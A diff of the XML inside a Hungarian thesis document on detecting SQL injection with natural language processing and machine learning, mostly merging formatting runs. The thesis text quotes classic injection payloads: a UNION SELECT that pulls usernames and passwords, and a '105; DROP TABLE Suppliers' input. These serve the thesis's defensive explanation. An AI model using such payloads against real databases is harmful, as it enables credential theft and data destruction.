+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">3.1-es ábra: </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>machine_learning_app</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a program fő mappájának felépítése</w:t>
+      </w:r>
+    </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId23"/>
-      <w:footerReference w:type="default" r:id="rId24"/>
-      <w:headerReference w:type="first" r:id="rId25"/>
-      <w:pgSz w:w="11906" w:h="16838"/>
+      <w:pgSz w:w="16838" w:h="11906" w:orient="landscape"/>
       <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="709" w:footer="709" w:gutter="567"/>
       <w:cols w:space="708"/>
       <w:titlePg/>
@@ -19902,7 +23241,28 @@
     <w:pPr>
       <w:pStyle w:val="lfej"/>
       <w:jc w:val="center"/>
+      <w:rPr>
+        <w:lang w:val="hu-HU"/>
+      </w:rPr>
     </w:pPr>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="hu-HU"/>
+      </w:rPr>
+      <w:t>SQ</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="hu-HU"/>
+      </w:rPr>
+      <w:t>L</w:t>
+    </w:r>
+    <w:r>
+      <w:rPr>
+        <w:lang w:val="hu-HU"/>
+      </w:rPr>
+      <w:t xml:space="preserve"> injection detektálás természetes nyelvi feldolgozó rendszerek és gépi tanulás által</w:t>
+    </w:r>
   </w:p>
 </w:hdr>
 </file>

--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -154,174 +154,8 @@
           <w:szCs w:val="32"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SQL injection </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>detection</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>using</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>natural</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>language</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>processing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>systems</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>machine</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>learning</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>SQL injection detection using natural language processing systems and machine learning</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1047,33 +881,15 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egy kód SQL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>egy kód SQL injection</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>injection</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>beli</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">beli </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1213,36 +1029,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Visual </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Studio</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Code</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Visual Studio Code</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
@@ -1600,9 +1388,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> train/test készlet,</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1611,9 +1398,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>train</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1622,7 +1408,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>/test készlet,</w:t>
+        <w:t>K-Fold</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1632,7 +1418,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1642,7 +1428,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Fold</w:t>
+        <w:t>c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1652,9 +1438,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>onfusion m</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1663,7 +1448,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>c</w:t>
+        <w:t>a</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1673,9 +1458,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>onfusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">trix, </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1684,9 +1468,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>r</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1695,7 +1478,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>m</w:t>
+        <w:t>ecal</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1705,61 +1488,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>trix</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ecal</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>l</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -4403,14 +4133,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>téma</w:t>
+        <w:t>A téma</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4418,7 +4141,6 @@
         </w:rPr>
         <w:t>megnevezés</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -4487,35 +4209,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">The Open Web </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Application</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Security</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Project</w:t>
+        <w:t>The Open Web Application Security Project</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4685,52 +4379,119 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">' UNION SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>' UNION SELECT username, password FROM user</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>s</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve">-- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">megadása </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">bemeneti paraméterként </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">az alábbi SQL lekérdezést futtathatja amennyiben </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>a bemenet sérülékeny</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">létezik </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>users</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tábla, valamint </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> és </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>user</w:t>
+        <w:t>password</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> oszlop:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4738,263 +4499,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-- </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[1]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">megadása </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">bemeneti paraméterként </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">az alábbi SQL lekérdezést futtathatja amennyiben </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>a bemenet sérülékeny</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">létezik </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> tábla, valamint </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> és </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> oszlop:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>name</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>description</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>products</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> WHERE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>category</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = ’</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Gifts</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">’ UNION SELECT </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>username</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>password</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> FROM </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>users</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -5132,33 +4638,18 @@
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
-        <w:t>(in-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>band</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>classic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>(in-band</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, classic</w:t>
+      </w:r>
       <w:r>
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>SQLi</w:t>
+        <w:t xml:space="preserve"> SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="8"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5438,48 +4929,46 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">105; DROP TABLE </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>105; DROP TABLE Suppliers</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:vertAlign w:val="superscript"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[2]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Így a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tényleges </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">lekérdezés </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Suppliers</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>[2]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Így a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">tényleges </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">lekérdezés </w:t>
+        <w:t>SELECT</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5487,7 +4976,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5495,7 +4984,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>*</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5503,7 +4992,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>*</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5511,7 +5000,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>FROM</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5519,7 +5008,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>FROM</w:t>
